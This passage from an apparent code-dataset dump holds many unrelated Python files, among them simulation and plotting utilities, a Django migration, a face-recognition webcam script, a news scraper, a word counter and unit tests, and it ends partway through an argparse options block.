text stringlengths 8 6.05M |
|---|
class Person(object):
def __init__(self,count):
self.count = count;
self.prev = None
self.next = None
def shout(self,shout,deadif):
if (shout < deadif): return (shout + 1)
self.prev.next = self.next
self.next.prev = self.prev
return 1
class Chain(object):
def __init__(self,size):
self.first = None
last = None
for i in range(size):
current = Person(i)
if self.first == None : self.first = current
if last != None :
last.next = current
current.prev = last
last = current
self.first.prev = last
last.next = self.first
def kill(self,nth):
current = self.first
shout = 1
while current.next != current:
shout = current.shout(shout,nth)
current = current.next
self.first = current
return current
import time
ITER = 100000
start = time.time()
for i in range(ITER):
chain = Chain(40)
chain.kill(3)
end = time.time()
print('Time per iteration = %s microseconds ' % ((end - start) * 1000000 / ITER)) |
"""
MIT License
Copyright (c) 2018 Simon Raschke
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
class clustersize_histogram(object):
def __init__(self):
return
def calculate(self, data, time_range=None):
"""
data : dict of data. key "clusters" must be present
"""
if time_range == None:
self.data = {}
for key in data.keys():
self.data[key] = data[key]["clusters"].values()
else:
self.data = {}
for key in data.keys():
if key >= min(time_range) <= max(time_range):
self.data[key] = data[key]["clusters"].values()
values = []
for vs in self.data.values():
values.extend(vs)
self.accumulated_values = values
hist, bins = np.histogram(np.array(values),bins=np.arange(1,max(values)+2), weights=np.array(values), density=True)
return hist, bins
class inner_energy_plot(object):
def __init__(self):
return
def calculate(self, data, time_range=None):
if time_range == None:
self.data = data
else:
self.data = {}
for key in data.keys():
if key >= min(time_range) <= max(time_range):
self.data[key] = {}
self.data[key]["inner_energy"] = data[key]["innter_energy"].values()
timepoints = sorted(list(set(self.data.keys())))
inner_energies = [ self.data[t]["inner_energy"] for t in timepoints ]
return timepoints, inner_energies
import json
class pyFclusterEncoder(json.JSONEncoder):
def default(self, obj):
try:
iterable = iter(obj)
except TypeError:
pass
else:
return list(iterable)
if isinstance(obj, np.ndarray):
return obj.tolist()
if isinstance(obj, np.int64):
return int(obj)
return json.JSONEncoder.default(self, obj)
import os
class JSON(object):
def __init__(self):
self.data = {}
return
def add_data(self, step, parameters, snapshot):
self.data.update( {step: {"data": snapshot} } )
self.data[step].update( parameters )
return self
def write_to_file(self, filename):
for key, val in self.data.items():
for nested_key, nested_val in self.data[key].items():
if hasattr(nested_val,'keys'):
#converting nested dict keys to string
self.data[key][nested_key] = {str(k):v for k,v in self.data[key][nested_key].items()}
with open(filename, 'w') as FILE:
json.dump(self.data, FILE, cls=pyFclusterEncoder)
return self
def read_from_file(self, filepath):
assert(os.path.exists(filepath))
with open(filepath) as FILE:
self.data = json.load(FILE)
# converting all the strings back to int and the lists back to np.arrays
self.data = {int(k):v for k,v in self.data.items()}
for key in self.data.keys():
if isinstance(self.data[key], list):
self.data[key] = np.array(self.data[key])
if isinstance(self.data[key], str):
try:
self.data[key] = int(self.data[key])
except:
pass
for nkey in self.data[key].keys():
if isinstance(self.data[key][nkey], list):
self.data[key][nkey] = np.array(self.data[key][nkey])
if isinstance(self.data[key][nkey], str):
try:
self.data[key][nkey] = int(self.data[key][nkey])
except:
pass
if hasattr(self.data[key][nkey],'keys'):
self.data[key][nkey] = {int(k):v for k,v in self.data[key][nkey].items()}
return self
import cv2
import pprint as pp
class Video(object):
def __init__(self, outname = "system.avi"):
self.name = outname.split('.')[0]
self.format = outname.split('.')[1]
self.output_complete = outname
def render(self, data):
the_data = np.array(data[list(set(data.keys()))[0]]["data"])
width, height = the_data.shape if len(the_data.shape) > 1 else (the_data.shape[0],1)
scaling_factor = None
print(width, height)
if width >= height and width <= 900:
scaling_factor = np.floor(900.0/width)
width *= scaling_factor
height *= scaling_factor
writer = cv2.VideoWriter(self.output_complete, cv2.VideoWriter_fourcc(*"x264"), 30, (int(width),int(height)))
for key in sorted(list(set(data.keys()))):
converted_frame = np.ndarray( shape=(int(width), int(height),3), dtype=np.uint8)
for i in range(len(data[key]["data"])):
is_occupied = bool(data[key]["data"][i])
if is_occupied:
converted_frame[int(i*scaling_factor):int(i*scaling_factor+scaling_factor), 0:int(scaling_factor), :] = 255
else:
converted_frame[int(i*scaling_factor):int(i*scaling_factor+scaling_factor), 0:int(scaling_factor), :] = 0
# pp.pprint(converted_frame.astype('uint8'))
# pp.pprint(np.random.randint(0, 255, (480,640,3)).astype('uint8'))
writer.write(converted_frame.astype('uint8'))
writer.release() |
# Generated by Django 2.2 on 2019-03-13 15:48
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wikiApp', '0002_auto_20190313_1524'),
]
operations = [
migrations.RenameModel(
old_name='newuser',
new_name='newuserModel',
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 5 16:02:10 2018
@author: Josh Jones
"""
# The following details a DNA sequence and its various complements
seq = input("Enter a DNA sequence consisting of A's, T's, G's, or C's: ")
seq = seq.upper()
for letter in seq:
if letter != 'A' and letter != 'T' and letter != 'G' and letter != 'C':
seq = seq.replace(letter, '-')
# Print the length and original sequence
print("Length of Sequence:", len(seq))
print("Original DNA Sequence: 5`-", seq, "-3`")
# Take and print the complement
complement = []
seq_complement = {'A':'T', 'T':'A', 'G':'C', 'C':'G', '-':'-'}
for letter in seq:
complement.append(seq_complement[letter])
print("Complement Sequence: 3`-", ''.join(complement), "-5`")
# Take and print the reverse
l = list(seq)
l.reverse()
seq = ''.join(l)
print("Reverse Sequence: 3`-", seq, "-5`")
# Reverse the complement and print
l = list(complement)
l.reverse()
print("Reverse Complement: 5`-", ''.join(l), "-3`")
|
# -*- coding: UTF-8 -*-
import os,dlib,glob,numpy
from skimage import io
import cv2
import imutils
'''
if len(sys.argv) != 2:
print("缺少要辨識的圖片名稱")
exit()
'''
# 人臉68特徵點模型路徑
predictor_path = "shape_predictor_68_face_landmarks.dat"
# 人臉辨識模型路徑
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
# 比對人臉圖片資料夾名稱
faces_folder_path = "./rec"
# 需要辨識的人臉圖片名稱
#img_path = sys.argv[ 1]
# 載入人臉檢測器
detector = dlib.get_frontal_face_detector()
# 載入人臉特徵點檢測器
sp = dlib.shape_predictor(predictor_path)
# 載入人臉辨識檢測器
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
# 比對人臉描述子列表
descriptors = []
# 比對人臉名稱列表
candidate = []
# 針對比對資料夾裡每張圖片做比對:
# 1.人臉偵測
# 2.特徵點偵測
# 3.取得描述子
def reg():
for f in glob.glob(os.path.join(faces_folder_path, "*.jpg")):
base = os.path.basename(f)
# 依序取得圖片檔案人名
candidate.append(os.path.splitext(base)[ 0])
img = io.imread(f)
# 1.人臉偵測
dets = detector(img, 1)
for k, d in enumerate(dets):
# 2.特徵點偵測
shape = sp(img, d)
# 3.取得描述子,128維特徵向量
face_descriptor = facerec.compute_face_descriptor(img, shape)
# 轉換numpy array格式
v = numpy.array(face_descriptor)
descriptors.append(v)
reg()
#選擇第一隻攝影機
cap = cv2.VideoCapture(0)
#調整預設影像大小
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
while True:
ret, frame = cap.read()
cv2.imshow("Face Recognition", frame)
#img = io.imread(img_path)
dets = detector(frame, 1)
dist = []
for k, d in enumerate(dets):
dist=[]
shape = sp(frame, d)
face_descriptor = facerec.compute_face_descriptor(frame, shape)
d_test = numpy.array(face_descriptor)
x1 = d.left()
y1 = d.top()
x2 = d.right()
y2 = d.bottom()
frame2 = frame.copy()
# 以方框標示偵測的人臉
cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2, cv2.LINE_AA)
# 計算歐式距離
for i in descriptors:
dist_ = numpy.linalg.norm(i -d_test)
dist.append(dist_)
# 將比對人名和比對出來的歐式距離組成一個dict
c_d = dict(zip(candidate,dist))
# 根據歐式距離由小到大排序
cd_sorted = sorted(c_d.items(), key = lambda d:d[1])
print(cd_sorted)
if cd_sorted[0][1]>0.5:
name = input("請輸入人名")
frame2 = imutils.resize(frame2, width = 600)
cv2.imwrite("rec\\"+name+".jpg",frame2)
reg()
else:
# 取得最短距離就為辨識出的人名
rec_name = cd_sorted[0][0]
# 將辨識出的人名印到圖片上面
cv2.putText(frame, rec_name, (x1, y1), cv2. FONT_HERSHEY_SIMPLEX , 1, (255, 255, 255), 2, cv2. LINE_AA)
frame = imutils.resize(frame, width = 600)
cv2.imshow("Face Recognition", frame)
#隨意Key一鍵結束程式
if cv2.waitKey(1) == 27:
cap.release()
cv2.destroyAllWindows()
break |
#!/usr/bin/env python
import yaml
import argparse
import numpy as np
class Lammps2ForceSets:
def __init__(self,
forces_filenames,
disp_filename="disp.yaml"):
self._forces_filenames = forces_filenames
self._disp_filename = disp_filename
def run(self):
self.read_disp_yaml()
self.create_force_sets()
self.write_force_sets()
def read_disp_yaml(self):
with open(self._disp_filename, "r") as f:
d = yaml.safe_load(f)
if 'natom' not in d: # phonopy_disp.yaml
d['natom'] = len(d['supercell']['points'])
self._disp_data = d
def create_force_sets(self):
force_sets = []
for forces_filename in self._forces_filenames:
print("forces_filename:", forces_filename)
forces = self._read_forces_from_lammps(forces_filename)
force_sets.append(forces)
force_sets = np.array(force_sets)
self._force_sets = force_sets
def _read_forces_from_lammps(self, filename):
forces = []
with open(filename, "r") as f:
for line in f:
if "ITEM: NUMBER OF ATOMS" in line:
line2 = next(f)
natom = int(line2.split()[0])
elif "fx fy fz" in line:
for _ in range(natom):
line2 = next(f)
forces.append([float(x) for x in line2.split()[-3:]])
break
forces = np.array(forces)
return forces
def write_force_sets(self):
disp_data = self._disp_data
with open("FORCE_SETS", "w") as f:
f.write("{}\n".format(disp_data["natom"]))
f.write("{}\n".format(len(disp_data["displacements"])))
for i, d in enumerate(disp_data["displacements"]):
forces = self._force_sets[i]
f.write("\n")
f.write("{}\n".format(d["atom"]))
for i in range(3):
f.write(" {:20.16f}".format(d["displacement"][i]))
f.write("\n")
for force in forces:
for i in range(3):
f.write(" {:16.10f}".format(force[i]))
f.write("\n")
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--disp_yaml",
default="disp.yaml",
type=str,
help="disp.yaml filename.")
parser.add_argument("-f", "--forces",
nargs="+",
type=str,
help="LAMMPS dump files including forces.")
args = parser.parse_args()
Lammps2ForceSets(
forces_filenames=args.forces,
disp_filename=args.disp_yaml,
).run()
if __name__ == "__main__":
main()
|
from django.contrib import admin
from .models import Channel, Project, Tag, Profile
# Register your models here.
admin.site.register([Channel, Project, Tag, Profile])
|
from selenium import webdriver
from bs4 import BeautifulSoup
import singleNewsCrawler
import MySQLdb
import configparser
class CNNScrapper:
def __init__(self):
'''
params:
database credentials. Fill up the config.ini according to your credentials
'''
self.driver=webdriver.PhantomJS('/phantomjs')
self.rooturl='https://www.cnn.com/' #entry point
self.trumpUrls=[]
self.newsContents=[]
config = configparser.ConfigParser()
config.read("config.ini")
self.host=config.get('CREDENTIALS','host')
self.uname=config.get('CREDENTIALS','username')
self.pwd=config.get('CREDENTIALS','password')
self.dbName=config.get('CREDENTIALS','database')
self.priorityIndex=0
self.singleNewsScrapper=singleNewsCrawler.singleCNNNews()
def postInDB(self): #this function updates the news in the database
conn=MySQLdb.connect(self.host,self.uname,self.pwd,self.dbName,charset="utf8")
c=conn.cursor()
c.execute('TRUNCATE table cnnTop25News')
if(len(self.newsContents)>30):
self.newsContents=self.newsContents[:24]
print(len(self.newsContents))
for i in range(len(self.newsContents)):
c.execute('INSERT into cnnTop25News (title,dsc,long_dsc,postUri) VALUES (%s,%s,%s,%s);',(self.newsContents[i]['title'],self.newsContents[i]['summary'],self.newsContents[i]['description'],self.newsContents[i]['url']))
conn.commit()
conn.close()
def crawl(self): #main crawler function
#crawl homepage
try:
self.driver.get(self.rooturl)
self.driver.execute_script("window.scrollTo(0, 2000);") #automated scroll down
except:
return
source=self.driver.page_source
self.crawlHomepage(source)
#crawl politics
try:
self.driver.get(self.rooturl+'politics')#Politics category
self.driver.execute_script("window.scrollTo(0, 2000);")#automated scroll down
except:
return
source=self.driver.page_source
self.crawlPolitics(source)
#crawl us
try:
self.driver.get(self.rooturl+'us')#US Category
self.driver.execute_script("window.scrollTo(0, 2000);")#automated scroll down
except:
return
source=self.driver.page_source
self.crawlUS(source)
#now get all the title and description
for i in range(len(self.trumpUrls)):
data=self.singleNewsScrapper.getContents(self.trumpUrls[i]) #Getting the contents from each news URLs
if (data=='Error'):
continue
else:
self.newsContents.append(data)
self.postInDB()
def crawlUS(self,source): #function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the US section
polSoup=BeautifulSoup(source,'lxml')
headlines=polSoup.find_all('h3',class_='cd__headline')
for i in range(len(headlines)):
spn=str(headlines[i].contents)
soup2=BeautifulSoup(spn,'lxml')
hdln=soup2.find('span',class_='cd__headline-text')
if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
urlDOM=soup2.find('a')
# data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
self.trumpUrls=list(set(self.trumpUrls))
print(len(self.trumpUrls))
def crawlPolitics(self,source):#function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the politics section
polSoup=BeautifulSoup(source,'lxml')
headlines=polSoup.find_all('h3',class_='cd__headline')
for i in range(len(headlines)):
spn=str(headlines[i].contents)
soup2=BeautifulSoup(spn,'lxml')
hdln=soup2.find('span',class_='cd__headline-text')
if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
urlDOM=soup2.find('a')
# data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
self.trumpUrls=list(set(self.trumpUrls))
print(len(self.trumpUrls))
def crawlHomepage(self,source):#function to get all news URLs that contains Donald Trump (not Melania or Ivanka) in the home page
homeSoup=BeautifulSoup(source,'lxml')
headlines=homeSoup.find_all('h3',class_='cd__headline')
#check if the headline contains about Trump
for i in range(len(headlines)):
spn=str(headlines[i].contents)
soup2=BeautifulSoup(spn,'lxml')
hdln=soup2.find('span')
if(hdln.text.lower().find('trump')>-1) and not (hdln.text.lower().find('ivanka')>-1) and not (hdln.text.lower().find('melania')>-1):
# print(hdln.text)
urlDOM=soup2.find('a')
# data={'headline':hdln.text,'url':self.rooturl+urlDOM['href']}
self.trumpUrls.append(self.rooturl+urlDOM['href'][1:])
self.trumpUrls=list(set(self.trumpUrls))
print(len(self.trumpUrls))
def main():
c=CNNScrapper()
c.crawl()
if __name__=='__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Created on June 10 20:54:27 2018
@author: Victor
"""
import os
import argparse
import re
import time
import multiprocessing
from multiprocessing import Pool
whitechars = '\?|\.|\!|\/|\\|\;|\:|`|_|,'
stopwords={"did", "out", "got", "her", "were", "the", "and", "was", "that", "his", "you", "with", "they", "for", "had", "this", "but", "there", "then", "him", "not", "are", "them", "into", "she"}
def process_files(filelist):
"""
read content of each file from list into string,
clean white chars, then split and count words
"""
dic_local={}
for file in filelist:
document = open(file, 'r')
text_string = document.read().lower()
text_string=re.sub(whitechars, '', text_string)
for word in text_string.split():
if len(word)>2 and word not in stopwords:
dic_local[word]=dic_local.get(word, 0)+1
return dic_local
def build_fileslist(pathlist):
"""
build flat list of files
"""
files=[]
for p in pathlist:
if os.path.exists(p):
if os.path.isfile(p):
files.append(p)
else:
for root, directories, filenames in os.walk(p):
for filename in filenames:
files.append(os.path.join(root,filename))
return files
def compute_data(workers_data, nwords):
"""
combine data produced by workers and sort
"""
dic_combined=workers_data[0]
for i in range(1,len(workers_data)):
for key in workers_data[i].keys():
dic_combined[key]=dic_combined.get(key, 0)+workers_data[i][key]
for word in sorted(dic_combined, key=dic_combined.get, reverse=True)[:nwords]:
print ("word '%s' occured '%d' times" % (word, dic_combined[word]))
def generate_workers_input(files, workers_num):
worker_input=[]
bucket_size=len(files)//workers_num
if bucket_size*workers_num < len(files):
bucket_size= bucket_size+1
for i in range(workers_num):
worker_input.append(files[bucket_size*i:bucket_size*(i+1)])
return worker_input
def main():
parser = argparse.ArgumentParser(
description='Display N most frequent words in provided files')
parser.add_argument('count', type=int, metavar='N', help='number of most frequent words')
parser.add_argument('files', type=str, nargs='+', help='list of files/dirs to scan')
args = parser.parse_args()
files=build_fileslist(args.files)
if len(files):
startTime = time.time()
workers_num=multiprocessing.cpu_count()
worker_input=generate_workers_input(files, workers_num)
pool = Pool(processes=workers_num)
workers_data=pool.map(process_files, worker_input)
compute_data(workers_data, args.count)
endTime = time.time()
print ("The job took " + str(endTime - startTime) + " seconds to complete")
else:
print("no single valid path exists, please provide at least one")
parser.print_help()
if __name__ == '__main__':
main() |
import sqlite3
from Tkinter import *
db = sqlite3.connect('NDI.db')
cur = db.cursor()
def add():
db.execute("create table if not exists pt (date text,task text,hrs int,remarks text)")
db.execute("create table if not exists mt (date text,task text,hrs int,remarks text)")
db.execute("create table if not exists et (date text,task text,hrs int,remarks text)")
db.execute("create table if not exists ut (date text,task text,hrs int,remarks text)")
add = raw_input("add more(y/n): ")
while add == "y":
method = raw_input("method(mt/pt/et/ut: ")
date = raw_input("date: ")
task = raw_input("task: ")
hrs = raw_input("hrs: ")
remarks = raw_input("remarks: ")
db.execute("insert into " + method +" (date, task, hrs, remarks) values(?, ?, ?, ?)", (date, task, hrs, remarks))
add = raw_input("add more(y/n): ")
db.commit()
def select():
cur.execute("select * from pt")
print(cur.fetchall())
def gui():
# window
root = Tk()
v = StringVar()
# modify root window
root.title("NDI Database")
root.geometry("1000x500")
app = Frame(root)
app.grid()
#Label(root, text = "Choose a Method",).pack(anchor = W)
Radiobutton(root,
text = "mt",
variable = v,
value = "mt").pack(side = LEFT, anchor = W)
Radiobutton(root,
text = "et",
variable = v,
value = "et").pack(side = LEFT, anchor = W)
Radiobutton(root,
text = "ut",
variable = v,
value = "ut").pack(side = LEFT, anchor = W)
Radiobutton(root,
text = "pt",
variable = v,
value = "pt").pack(side = LEFT, anchor = W)
# event loop
root.mainloop()
#add()
#select()
gui() |
from datarender.fieldset import (
FieldSet, HeaderSet, ColumnSet, FormFieldSet, DynamicFieldSet)
from datarender.fields import (
BaseField, Field, Header, FieldMapper,
FormField, BaseDateField, DateField, DateTimeField)
|
def cube(x):
return x ** 3
def fibonacci(n):
if(n == 0):
return []
if(n == 1):
return [0]
if(n == 2):
return [0, 1]
else:
before = fibonacci(n - 1)
return before + [before[-1] + before[-2]]
|
import re
text = input()
target = input()
pattern = re.compile(target)
results = pattern.search(text)
if not results: print("(-1, -1)")
while results:
print("({0}, {1})".format(results.start(), results.end()-1))
results = pattern.search(text, results.start()+1)
|
from unittest import TestCase
import lamdex
import requests
import mock
class Test_Lamdex(TestCase):
def test_return_rate_returns_1(self):
self.assertEqual(lamdex.return_rate('EOS', test=True), 1)
def test_return_rate_fails_in_non_supported_tokens(self):
try:
lamdex.return_rate('XXX')
self.assertTrue(False)
except Exception as e:
print(e)
self.assertTrue(True)
def test_return_rate_is_accurate(self):
url = 'https://api.hitbtc.com/api/2/public/ticker/TAUBTC'
r = requests.get(url)
last = float(r.json()['last'])
self.assertEqual(lamdex.return_rate('TAU'), last)
def test_forex_test_returns_1(self):
self.assertEqual(lamdex.forex('TAU', 'EOS', test=True), 1)
def test_forex_is_accurate(self):
url = 'https://api.hitbtc.com/api/2/public/ticker/TAUBTC'
r = requests.get(url)
last_tau = float(r.json()['last'])
url = 'https://api.hitbtc.com/api/2/public/ticker/EOSBTC'
r = requests.get(url)
last_eos = float(r.json()['last'])
test_forex = last_tau/last_eos
self.assertEqual(lamdex.forex('TAU', 'EOS'), test_forex)
|
# Copyright (c) 2019-2020, RTE (https://www.rte-france.com)
# See AUTHORS.txt
# This Source Code Form is subject to the terms of the Apache License, version 2.0.
# If a copy of the Apache License, version 2.0 was not distributed with this file, you can obtain one at http://www.apache.org/licenses/LICENSE-2.0.
# SPDX-License-Identifier: Apache-2.0
# This file is part of hadar-simulator, a python adequacy library for everyone.
from typing import Dict, List, Tuple
import numpy as np
import pandas as pd
import plotly.graph_objects as go
from matplotlib.cm import coolwarm
from hadar.analyzer.result import ResultAnalyzer
from hadar.viewer.abc import ABCPlotting, ABCElementPlotting
__all__ = ["HTMLPlotting"]
class HTMLElementPlotting(ABCElementPlotting):
def __init__(
self, unit: str, time_index, node_coord: Dict[str, List[float]] = None
):
self.unit = unit
self.time_index = time_index
self.coord = node_coord
self.cmap = coolwarm
self.cmap_plotly = HTMLElementPlotting.matplotlib_to_plotly(self.cmap, 255)
self.cmap_cons = [
"brown",
"blue",
"darkgoldenrod",
"darkmagenta",
"darkorange",
"cadetblue",
"forestgreen",
"indigo",
"olive",
"darkred",
]
@classmethod
def matplotlib_to_plotly(cls, cmap, res: int):
"""
Convert matplotlib color scale to plotly color scale.
:param cmap: matplotlib color scale function
:param res: resolution to use
:return: list of string use by plotly
"""
h = 1.0 / (res - 1)
pl_colorscale = []
for k in range(res):
C = (np.array(cmap(k * h)[:3]) * 255).astype(np.uint8)
pl_colorscale.append([k * h, "rgb" + str((C[0], C[1], C[2]))])
return pl_colorscale
def timeline(self, df: pd.DataFrame, title: str):
scenarios = df.index.get_level_values("scn").unique()
alpha = max(0.01, 1 / scenarios.size)
color = "rgba(0, 0, 0, %.2f)" % alpha
fig = go.Figure()
for scn in scenarios:
fig.add_trace(
go.Scatter(
x=self.time_index,
y=df.loc[scn],
mode="lines",
hoverinfo="name",
name="scn %0d" % scn,
line=dict(color=color),
)
)
fig.update_layout(
title_text=title,
yaxis_title="Quantity %s" % self.unit,
xaxis_title="time",
showlegend=False,
)
return fig
def monotone(self, y: np.ndarray, title: str):
y.sort()
y = y[::-1]
x = np.linspace(0, 100, y.size)
fig = go.Figure()
fig.add_trace(go.Scatter(x=x, y=y, mode="markers"))
fig.update_layout(
title_text=title,
yaxis_title="Quantity %s" % self.unit,
xaxis_title="%",
showlegend=False,
)
return fig
def gaussian(self, rac: np.ndarray, qt: np.ndarray, title: str):
# 1 / x - m \ 2
# --------- * exp -0.5 * | -------- |
# o * √2*Pi \ o /
def _gaussian(x, m, o):
return np.exp(-0.5 * np.power((x - m) / o, 2)) / o / 1.772454
x = np.linspace(np.min(qt) * 0, np.max(qt) * 1.2, 100)
m = np.mean(qt)
o = np.std(qt)
green = qt[rac >= 0]
red = qt[rac < 0]
fig = go.Figure()
fig.add_trace(
go.Scatter(
x=x,
y=_gaussian(x, m, o),
mode="lines",
hoverinfo="none",
line=dict(color="grey"),
)
)
fig.add_trace(
go.Scatter(
x=green,
y=_gaussian(green, m, o),
hovertemplate="%{x:.2f} " + self.unit,
name="passed",
mode="markers",
marker=dict(color="green", size=10),
)
)
fig.add_trace(
go.Scatter(
x=red,
y=_gaussian(red, m, o),
hovertemplate="%{x:.2f} " + self.unit,
name="failed",
mode="markers",
marker=dict(color="red", size=10),
)
)
fig.update_layout(
title_text=title,
yaxis=dict(visible=False),
yaxis_title="",
xaxis_title="Quantity %s" % self.unit,
showlegend=False,
)
return fig
def candles(self, open: np.ndarray, close: np.ndarray, title: str):
fig = go.Figure()
text = [
"%s<br>Begin=%d<br>End=%d<br>Flow=%d" % (t, o, c, c - o)
for o, c, t in zip(open, close, self.time_index)
]
fig.add_trace(
go.Ohlc(
x=self.time_index,
open=open,
high=open,
low=close,
close=close,
hoverinfo="text",
text=text,
)
)
fig.update_layout(
title_text=title,
yaxis_title="Quantity %s" % self.unit,
xaxis_rangeslider_visible=False,
xaxis_title="Time",
showlegend=False,
)
return fig
def stack(
self,
areas: List[Tuple[str, np.ndarray]],
lines: List[Tuple[str, np.ndarray]],
title: str,
):
fig = go.Figure()
# Stack areas
stack = np.zeros_like(self.time_index, dtype=float)
for i, (name, data) in enumerate(areas):
stack += data
fig.add_trace(
go.Scatter(
x=self.time_index,
y=stack.copy(),
name=name,
mode="none",
fill="tozeroy" if i == 0 else "tonexty",
)
)
# Stack lines.
# Bottom line have to be top frontward. So we firstly stack lines then plot in reverse set.
stack = np.zeros_like(self.time_index, dtype=float)
stacked_lines = []
for i, (name, data) in enumerate(lines):
stack += data
stacked_lines.append((name, stack.copy()))
for i, (name, data) in enumerate(stacked_lines[::-1]):
fig.add_trace(
go.Scatter(
x=self.time_index,
y=data,
line_color=self.cmap_cons[i % 10],
name=name,
line=dict(width=2),
)
)
fig.update_layout(
title_text=title, yaxis_title="Quantity %s" % self.unit, xaxis_title="time"
)
return fig
def matrix(self, data: np.ndarray, title):
def sdt(x):
x[x > 0] /= np.max(x[x > 0])
x[x < 0] /= -np.min(x[x < 0])
return x
fig = go.Figure(
data=go.Heatmap(
z=sdt(data.copy()),
x=self.time_index,
y=np.arange(data.shape[0]),
hoverinfo="text",
text=data,
colorscale="RdBu",
zmid=0,
showscale=False,
)
)
fig.update_layout(
title_text=title,
yaxis_title="scenarios",
xaxis_title="time",
showlegend=False,
)
return fig
def map_exchange(self, nodes, lines, limit, title, size):
if self.coord is None:
raise ValueError(
"Please provide node coordinate by setting param node_coord in Plotting constructor"
)
fig = go.Figure()
# Add node circle
keys = nodes.keys()
node_qt = [nodes[k] for k in keys]
node_coords = np.array([self.coord[n] for n in keys])
center = np.mean(node_coords, axis=0)
# Plot arrows
for (src, dest), qt in lines.items():
color = "rgb" + str(self.cmap(abs(qt) / 2 / limit + 0.5)[:-1])
self._plot_links(fig, src, dest, color, qt, size)
# Plot nodes
fig.add_trace(
go.Scattermapbox(
mode="markers",
lon=node_coords[:, 0],
lat=node_coords[:, 1],
hoverinfo="text",
text=node_qt,
marker=dict(
size=20,
colorscale=self.cmap_plotly,
cmin=-limit,
color=node_qt,
cmax=limit,
colorbar_title="Net Position %s" % self.unit,
),
)
)
fig.update_layout(
showlegend=False,
title_text=title,
mapbox=dict(
style="carto-positron",
center={"lon": center[0], "lat": center[1]},
zoom=1 / size / 0.07,
),
)
return fig
def _plot_links(
self, fig: go.Figure, start: str, end: str, color: str, qt: float, size: float
):
"""
Plot line with arrow to a figure.
:param fig: figure to use
:param start: start node
:param end: end node
:param color: color to use
:param qt: quantity to set inside label
:return:
"""
S = np.array([self.coord[start][0], self.coord[start][1]])
E = np.array([self.coord[end][0], self.coord[end][1]])
# plot line
fig.add_trace(
go.Scattermapbox(
lat=[S[1], E[1]],
hoverinfo="skip",
lon=[S[0], E[0]],
mode="lines",
line=dict(width=2 * size, color=color),
)
)
# vector flow direction
v = E - S
n = np.linalg.norm(v)
# Get orthogonal vector
w = np.array([v[1], -v[0]])
# Compute triangle points
A = E - v * 0.1
B = A - v / 10 - w / 10
C = A - v / 10 + w / 10
# plot arrow
fig.add_trace(
go.Scattermapbox(
lat=[B[1], A[1], C[1], B[1], None],
hoverinfo="text",
fill="toself",
lon=[B[0], A[0], C[0], B[0], None],
text=str(qt),
mode="lines",
line=dict(width=2 * size, color=color),
)
)
class HTMLPlotting(ABCPlotting):
"""
Plotting implementation interactive html graphics. (Use plotly)
"""
def __init__(
self,
agg: ResultAnalyzer,
unit_symbol: str = "",
time_start=None,
time_end=None,
node_coord: Dict[str, List[float]] = None,
):
"""
Create instance.
:param agg: ResultAggragator instence to use
:param unit_symbol: symbol on quantity unit used. ex. MW, litter, Go, ...
:param time_start: time to use as the start of study horizon
:param time_end: time to use as the end of study horizon
:param node_coord: nodes coordinates to use for map plotting
"""
ABCPlotting.__init__(self, agg, unit_symbol, time_start, time_end, node_coord)
self.plotting = HTMLElementPlotting(self.unit, self.time_index, self.coord)
|
import argparse
parser = argparse.ArgumentParser(description='Parser for all the training options')
# General options
parser.add_argument('-shuffle', action='store_true', help='Reshuffle data at each epoch')
parser.add_argument('-small_set', action='store_true', help='Whether uses a small dataset')
parser.add_argument('-train_record', action='store_true', help='Path to save train record')
parser.add_argument('-test_only', action='store_true', help='Only conduct test on the validation set')
parser.add_argument('-ckpt', default=0, type=int, help='Choose the checkpoint to run')
parser.add_argument('-model', required=True, help='Model type when we create a new one')
parser.add_argument('-data_dir', required=True, help='Path to data directory')
parser.add_argument('-train_list', required=True, help='Path to data directory')
parser.add_argument('-test_list', required=True, help='Path to data directory')
parser.add_argument('-save_path', required=True, help='Path to save train record')
parser.add_argument('-output_classes', required=True, type=int, help='Num of color classes')
# Training options
parser.add_argument('-learn_rate', default=1e-2, type=float, help='Base learning rate of training')
parser.add_argument('-momentum', default=0.9, type=float, help='Momentum for training')
parser.add_argument('-weight_decay', default=5e-4, type=float, help='Weight decay for training')
parser.add_argument('-n_epochs', default=20, type=int, help='Training epochs')
parser.add_argument('-batch_size', default=64, type=int, help='Size of mini-batches for each iteration')
parser.add_argument('-criterion', default='CrossEntropy', help='Type of objective function')
# Model options
